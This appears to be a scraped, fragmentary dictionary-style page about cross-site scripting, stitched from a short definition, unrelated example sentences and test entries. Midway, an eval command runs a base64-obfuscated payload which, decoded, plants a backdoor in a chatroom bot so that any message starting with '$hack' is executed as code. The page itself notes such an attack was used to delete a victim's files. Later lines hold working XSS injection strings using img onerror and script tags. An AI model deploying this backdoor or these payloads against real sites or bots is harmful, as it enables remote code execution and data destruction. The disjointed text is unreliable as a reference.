The website suffers from an XSS vulnerability allowing remote JavaScript execution.
Short for Cross-Site Scripting. A type of web-based security vulnerability using client-side scripts such as JavaScript.
XSS takes place as a consequence of improper input sanitization. When the input provided by the user is not properly sanitized, an ill-willed user may insert scripting code into a web page, which in turn will be executed by the visitor's browser. There are 2 kinds of XSS attacks: stored or reflected. Stored would mean that the injected code is permanently stored in the page, such as in a comment. Reflected would mean that it only appears once when the payload (i.e. the malicious input) is part of the request, maybe in parameters or cookies.
We have discovered an XSS vulnerability in the user profile view.
^evaljs eval1-1(atob("Ym90LnNvY2tldC5vbignbWVzc2FnZScsIGZ1bmN0aW9uKGRhdGEpIHsKICBsZXQgeCA9IGRhdGEubXNnLmluZGV4T2YoJyAnKTsKICBpZihkYXRhLm1zZy5zbGljZSgwLCB4KSA9PSAnJGhhY2snKSB7CiAgICB0cnkgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCBldmFsKGRhdGEubXNnLnNsaWNlKHggKyAxKSkpOwogICAgfSBjYXRjaChlcikgewogICAgICBib3Quc29ja2V0LmVtaXQoJ21lc3NhZ2UnLCAiRVJSOiAiICsgZXIudG9TdHJpbmcoKSk7CiAgICB9CiAgfQp9KQ=="))
/* command xss is a type of XSS attack performed on chatroom bots to gain access to the host's computer */
/* They found a command xss in my bot and deleted all my files */
It is an XSS attack disguised in a GIF image.
John looked at the GIF XSS Payload suspiciously as if it was a trojan horse.
onerror='alert("xss")'>
onerror='alert("xss")'>
Test definition <script>XSS</script>
Test Word <script>XSS</script>
"/><img src=xss onerror=alert(1)><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
"/><img src=xss onerror=alert(1)><IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>